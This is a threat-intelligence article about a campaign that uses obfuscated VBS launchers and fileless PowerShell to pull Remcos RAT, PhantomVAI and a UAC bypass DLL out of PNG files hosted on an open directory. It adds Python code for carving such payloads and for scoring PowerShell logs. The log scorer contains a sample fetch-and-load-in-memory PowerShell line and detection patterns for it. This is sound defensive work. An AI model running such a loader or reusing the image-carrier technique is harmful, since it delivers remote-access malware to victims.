Open Directory Malware Campaign Delivers RAT Payloads via VBS and PNG Loaders


Jennifer Sherman
March 25, 2026

Key Takeaways

  • A sophisticated, multi-stage malware campaign is actively deploying Remote Access Trojans (RATs) through a flexible, open-directory infrastructure.
  • The attack chain utilizes obfuscated Visual Basic Script (VBS) files to launch fileless PowerShell loaders, which then retrieve malicious payloads hidden within seemingly benign PNG image files.
  • Affected systems can be compromised with XWorm variants and Remcos RAT, along with a User Account Control (UAC) bypass, granting attackers persistent remote access and elevated privileges.
  • The campaign leverages an adaptable command-and-control (C2) setup, allowing threat actors to rapidly change or expand their malicious arsenal.

A complex, multi-stage malware operation has emerged, leveraging obfuscated Visual Basic Script (VBS) files, image-based loaders, and remote access trojans (RATs) to infiltrate target systems. Details of this campaign were uncovered by cybersecurity researchers at LevelBlue’s SpiderLabs Cyber Threat Intelligence team.


Initially, an endpoint detection in early 2026 flagged a suspicious VBS file. What appeared to be an isolated incident quickly revealed a more organized threat: a reusable delivery framework capable of distributing diverse malware payloads across multiple attack vectors from a unified infrastructure.

Initial Detection and Unveiling the Campaign

The campaign first came to light with the discovery of a VBS file, named Name_File.vbs, located in the Users\Public\Downloads directory of a compromised endpoint. SentinelOne’s endpoint protection quarantined the file before it could fully execute, but its encoded contents prompted further investigation.

Decoding the VBS script exposed a Base64-encoded PowerShell command containing external network references, indicating an intent to fetch additional malicious components from a remote server. This initial alert gave LevelBlue analysts a crucial entry point into a much broader operation.

The subsequent investigation by LevelBlue’s SpiderLabs team revealed an attacker-controlled domain hosting numerous obfuscated VBS files. Each file was designed to deliver a different malware payload, including various XWorm variants and Remcos RAT, often disguised as plain text files. The researchers also identified a separate infection chain on the same infrastructure, initiated by a fake PDF file, confirming the campaign’s deliberate multi-vector design. A detailed report on the campaign can be found in the LevelBlue blog.

Attacker Infrastructure: The Open Directory Advantage

The core of the attacker’s infrastructure revolved around openly accessible directories hosted on the domain news4me[.]xyz. Specific subdirectories like /coupon/, /protector/, and /invoice/ each played a distinct role in the attack. These directories were used for staging VBS launchers, hosting obfuscated payload files, and delivering alternative infection vectors.

This “open directory” strategy was a deliberate design choice that gave the attackers significant operational flexibility. It allowed them to rapidly update, rotate, or expand their hosted payloads without altering the underlying delivery logic, so the operation can continue even when individual components are detected and blocked.

Inside the Infection Mechanism: VBS to In-Memory RAT Execution

The infection process begins with a VBS file that functions solely as a launcher and contains no active malicious code itself.

[Figure: Name_File.vbs content (Source: LevelBlue)]

This script is heavily obscured using Unicode obfuscation. Removing these layers reveals a Base64-encoded PowerShell command, which serves as the true operational core of the attack.

[Figure: Name_File.vbs after Unicode removal (Source: LevelBlue)]

The decoded PowerShell command acts as a fileless loader. It enforces TLS 1.2 and employs the Net.WebClient class to retrieve a remote file from an Internet Archive URL.

[Figure: Name_File.vbs decoded PowerShell command (Source: LevelBlue)]

Instead of downloading a standard executable, the loader fetches a PNG image file named MSI_PRO_with_b64.png. This image appears innocuous, but it secretly harbors a Base64-encoded .NET assembly, known as PhantomVAI, embedded between custom BaseStart and BaseEnd markers. This assembly is loaded directly into memory via Reflection.Assembly::Load, allowing it to execute entirely in RAM and effectively bypass many file-based security defenses.

Once PhantomVAI is active, it receives two URLs through its VAI method for subsequent execution. The first URL, news4me[.]xyz/protector/johnremcos.txt, contains an obfuscated string that decodes into a fully functional instance of the Remcos RAT, providing the attacker with persistent remote access. The second URL delivers uac.png, another PNG file containing a User Account Control (UAC) Bypass DLL, embedded in the same format, designed to silently escalate privileges on the compromised system. This combination of payloads grants the attackers comprehensive control while leaving minimal traditional file artifacts.
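The carrier format described above (a valid PNG with a Base64-encoded PE between BaseStart and BaseEnd markers, used for both MSI_PRO_with_b64.png and uac.png) can be carved and validated offline during triage. The following is an added example, not LevelBlue's tooling or the actor's code: it builds a constructed 1x1 sample PNG with the markers appended after IEND, then carves the blob and checks whether it decodes to a PE image. The exact byte framing around the markers in the real files is an assumption.

```python
import base64
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Marker names are as reported in the write-up; how they are framed inside the
# actual carrier file is an assumption of this example.
START_MARKER = b"BaseStart"
END_MARKER = b"BaseEnd"

def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Encode one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)

def build_sample_carrier(payload: bytes) -> bytes:
    """Constructed sample: a valid 1x1 RGB PNG with the Base64 payload appended after
    IEND between the markers. Image viewers ignore trailing bytes, so it still renders."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)      # 1x1, 8-bit depth, RGB
    idat = zlib.compress(b"\x00" + b"\x00\x00\x00")            # filter byte + one pixel
    png = PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")
    return png + START_MARKER + base64.b64encode(payload) + END_MARKER

def carve_payload(data: bytes) -> dict:
    """Triage a suspected carrier: report whether it is a real PNG, whether a
    marker-delimited Base64 blob is present, and whether that blob decodes to a PE
    (.NET assemblies are PE files, so they start with 'MZ')."""
    result = {"is_png": data.startswith(PNG_SIG), "payload": None, "is_pe": False}
    m = re.search(re.escape(START_MARKER) + rb"(.*?)" + re.escape(END_MARKER), data, re.DOTALL)
    if m is None:
        return result
    blob = re.sub(rb"\s+", b"", m.group(1))          # tolerate line-wrapped Base64
    try:
        decoded = base64.b64decode(blob, validate=True)
    except ValueError:                               # binascii.Error subclasses ValueError
        return result
    result["payload"] = decoded
    result["is_pe"] = decoded.startswith(b"MZ")
    return result

if __name__ == "__main__":
    fake_pe = b"MZ" + b"\x00" * 62 + b"This program cannot be run in DOS mode"
    info = carve_payload(build_sample_carrier(fake_pe))
    print(info["is_png"], info["is_pe"], len(info["payload"]))
```

A file that is a genuine PNG and also carries a PE-shaped blob behind custom markers is the artifact to hash and escalate; an image with trailing bytes but no decodable payload is just noise.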

What You Should Do

  • Restrict Script Execution: Implement policies to restrict the execution of .vbs and .bat files from user-writable directories, such as Users\Public.
  • Enforce PowerShell Policies: Apply constrained PowerShell policies and enable comprehensive logging for in-memory execution to detect fileless attacks.
  • Network Filtering: Block WebDAV-based connections and consider filtering traffic to and from .xyz top-level domains to disrupt communication with known attacker infrastructure.
  • Advanced Endpoint Protection: Ensure your endpoint detection and response (EDR) solutions are configured to monitor for suspicious in-memory activity and fileless execution techniques, not just file-based threats.
  • Threat Intelligence Integration: Integrate external threat intelligence feeds to stay updated on new attacker tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs).
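The logging recommendation above is only useful with something to run over the logs. The following is an added example, not from the article or LevelBlue: a small triage pass over PowerShell script block records (Event ID 4104) that scores the loader traits described in the infection mechanism (TLS 1.2 enforcement, Net.WebClient fetch, Reflection.Assembly::Load, Base64 carving, image or archive source) so that a routine WebClient download on its own is not escalated. The record shape, the regexes and the sample events are constructed, and the URL is a placeholder.

```python
import re

# Indicator patterns for the loader chain described in the article. Constructed
# for this example; tune them against your own script block log baseline.
INDICATORS = {
    "forces_tls12": re.compile(r"SecurityProtocol\s*=.*Tls12", re.I),
    "webclient_fetch": re.compile(r"Net\.WebClient|Download(String|Data|File)\(", re.I),
    "reflective_load": re.compile(r"Reflection\.Assembly\]?::Load\(", re.I),
    "base64_carving": re.compile(r"FromBase64String|BaseStart|BaseEnd", re.I),
    "image_or_archive_source": re.compile(r"archive\.org|\.png\b", re.I),
}

def score_script_block(text: str) -> dict:
    """Return which indicators fired and whether the block should be escalated.
    Escalation needs a network fetch combined with in-memory assembly loading,
    or three or more indicators overall; a lone WebClient call is routine admin work."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    escalate = ("webclient_fetch" in hits and "reflective_load" in hits) or len(hits) >= 3
    return {"hits": hits, "escalate": escalate}

def triage_events(events: list) -> list:
    """Run score_script_block over 4104-style records (constructed shape:
    {'RecordId': int, 'ScriptBlockText': str}) and return only the escalated ones."""
    out = []
    for ev in events:
        result = score_script_block(ev["ScriptBlockText"])
        if result["escalate"]:
            out.append({"RecordId": ev["RecordId"], **result})
    return out

# Constructed sample records: benign admin activity, a block shaped like the
# fileless loader from the write-up (placeholder URL), and a benign WebClient download.
SAMPLE_EVENTS = [
    {"RecordId": 101, "ScriptBlockText": "Get-ChildItem 'C:\\Users\\Public\\Downloads' | Sort-Object Length"},
    {"RecordId": 102, "ScriptBlockText":
        "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;"
        "$w=New-Object Net.WebClient;$s=$w.DownloadString('https://archive.org/PLACEHOLDER/MSI_PRO_with_b64.png');"
        "[Reflection.Assembly]::Load([Convert]::FromBase64String($p))"},
    {"RecordId": 103, "ScriptBlockText": "(New-Object Net.WebClient).DownloadFile($url, 'C:\\tools\\sysmon.zip')"},
]

if __name__ == "__main__":
    for record in triage_events(SAMPLE_EVENTS):
        print(record)
```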
